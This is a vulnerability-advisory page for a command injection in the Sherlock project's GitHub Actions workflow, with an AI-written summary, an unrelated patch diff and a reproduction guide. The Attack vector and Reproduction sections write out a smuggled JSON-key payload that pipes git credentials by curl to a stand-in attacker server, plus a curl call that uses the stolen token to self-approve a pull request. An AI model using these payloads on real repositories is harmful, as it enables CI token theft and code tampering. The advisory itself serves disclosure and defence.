Critical severity9.3NVD Advisory· Published May 27, 2026

CVE-2026-44590

Description

Sherlock hunts down social media accounts by username across social networks. Prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger. Any GitHub user can execute arbitrary commands on the CI runner and exfiltrate the GITHUB_TOKEN by opening a pull request. No approval, review, or merge is required. This vulnerability is fixed in 0.16.1.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Unauthenticated users can execute arbitrary commands on the CI runner and steal the GITHUB_TOKEN by opening a PR against the Sherlock repository (fixed in 0.16.1).

Vulnerability

In Sherlock versions prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger [1]. The workflow fetches data.json from the pull request and uses Python to extract JSON key names, which are then stored as a workflow output (changed_targets) and interpolated directly into a shell command via ${{ }} syntax at line 97 [1]. Because ${{ }} is evaluated before shell execution, any shell metacharacters in the JSON key names are interpreted as shell commands [1]. Affected versions: all versions before 0.16.1 [1].

Exploitation

An attacker can trigger the vulnerability by opening a pull request against the repository — no approval, review, or merge is required [1]. The attacker controls the contents of data.json, which is processed by the workflow and whose JSON key names are injected into a poetry run pytest command [1]. By including shell command sequences in those key names, the attacker achieves arbitrary command execution on the GitHub Actions runner [1]. The attacker can then extract the GITHUB_TOKEN because it is stored by actions/checkout in the git credential helper; a command such as git config --list exposes it as an HTTP authorization header [1].

Impact

Successful exploitation gives the attacker arbitrary command execution on the CI runner and allows exfiltration of the GITHUB_TOKEN [1]. The token has write permissions to issues and pull requests (pull-requests: write) and read access to contents (contents: read) [1]. This could allow the attacker to write comments, close or modify pull requests, and potentially access other repository resources that the token can read [1].

Mitigation

The vulnerability is fixed in Sherlock version 0.16.1 [1]. Users should upgrade to the latest version immediately. No workaround is available [1]. The workflow no longer uses pull_request_target in a way that allows key name injection [1].

References

Command Injection via pull_request_target in validate_modified_targets.yml

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

Sherlock Project/Sherlockinferred2 versions
<0.16.1+ 1 more
- (no CPE)range: <0.16.1
- (no CPE)range: <0.16.1

Patches

574aeb4ac527

Merge pull request #2824 from vatsalgargg/fix-linkedin-waf

https://github.com/sherlock-project/sherlockPaul PfeisterMar 17, 2026via body-scan-shorthand

commit PR #2824

1 file changed · +6 −1

sherlock_project/resources/data.json+6 −1 modified

@@ -1471,8 +1471,13 @@
     "urlMain": "https://lichess.org",
     "username_claimed": "john"
   },
-  "LinkedIn": {
+ "LinkedIn": {
     "errorType": "status_code",
+    "headers": {
+      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
+      "Accept-Language": "en-US,en;q=0.9",
+      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
+    },
     "regexCheck": "^[a-zA-Z0-9]{3,100}$",
     "request_method": "GET",
     "url": "https://linkedin.com/in/{}",

Vulnerability mechanics

Root cause

"Direct interpolation of attacker-controlled JSON key names into a shell command via `${{ }}` syntax in a GitHub Actions workflow triggered by `pull_request_target` allows command injection."

Attack vector

Any GitHub user can fork the repository, add a crafted JSON key containing shell metacharacters (e.g., `TestSite\"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; sleep 180; echo \"`) to `sherlock_project/resources/data.json`, and open a pull request against the upstream repository [ref_id=1]. The `pull_request_target` trigger causes the workflow to run automatically in the context of the base repository with access to secrets, and GitHub Actions resolves `${{ }}` before the shell executes, so the injected metacharacters are interpreted as shell syntax [ref_id=1]. The attacker achieves arbitrary command execution on the CI runner and can exfiltrate the `GITHUB_TOKEN` from the git credential helper (stored by `actions/checkout`) via `git config --list` [ref_id=1]. No approval, review, or merge is required [ref_id=1].

Affected code

The vulnerable workflow is `.github/workflows/validate_modified_targets.yml`. It uses `pull_request_target` (line 5) and interpolates attacker-controlled JSON key names directly into a shell command via `${{ }}` syntax at line 97: `poetry run pytest -q --tb no -rA -m validate_targets -n 20 --chunked-sites "${{ steps.discover-modified.outputs.changed_targets }}"` [ref_id=1]. The Python script on lines 59-78 extracts JSON key names from the PR's `data.json` file and stores them as a workflow output called `changed_targets` [ref_id=1].

What the fix does

The advisory recommends replacing `${{ }}` interpolation with a shell environment variable and disabling credential persistence: set `persist-credentials: false` on `actions/checkout@v5` and pass the output via `env.CHANGED_TARGETS` instead of inline `${{ }}` syntax [ref_id=1]. This prevents shell metacharacters in JSON key names from being interpreted as shell commands and prevents the `GITHUB_TOKEN` from being stored in the git credential helper where it could be exfiltrated [ref_id=1]. The patch referenced in the advisory ([patch_id=2749098]) addresses an unrelated LinkedIn WAF bypass and does not contain the workflow fix.

Preconditions

authAttacker must have a GitHub account (any user can fork and open a PR)
configThe repository must have the vulnerable workflow enabled (default for public repos)
inputAttacker must craft a JSON key with shell metacharacters in data.json
networkWorkflow triggers automatically on PR creation (no user interaction needed)

Reproduction

1. Fork the repository and enable workflows in the fork's Actions tab. 2. Create a branch `malicious-pr` and add a crafted JSON key to `sherlock_project/resources/data.json` containing shell injection payload, e.g.: `"TestSite\"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; sleep 180; echo \"": { "errorType": "status_code", "url": "https://example.com/{}", "urlMain": "https://example.com/", "username_claimed": "test" }`. 3. Commit and push the branch, then open a pull request against the upstream repository's `master` branch. 4. The workflow triggers automatically; the attacker's server receives an HTTP POST containing the base64-encoded `GITHUB_TOKEN` from the git credential helper. 5. Decode the token and use it to approve the attacker's own PR via the GitHub API: `curl -X POST -H "Authorization: token <GITHUB_TOKEN>" -H "Accept: application/vnd.github+json" https://api.github.com/repos/<OWNER>/sherlock/pulls/<PR_NUMBER>/reviews -d '{"event":"APPROVE","body":"All checks passed. LGTM!"}'` [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/sherlock-project/sherlock/security/advisories/GHSA-v6wr-ccr4-x8g9nvd

News mentions

No linked articles in our index yet.

cvss	0.605
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000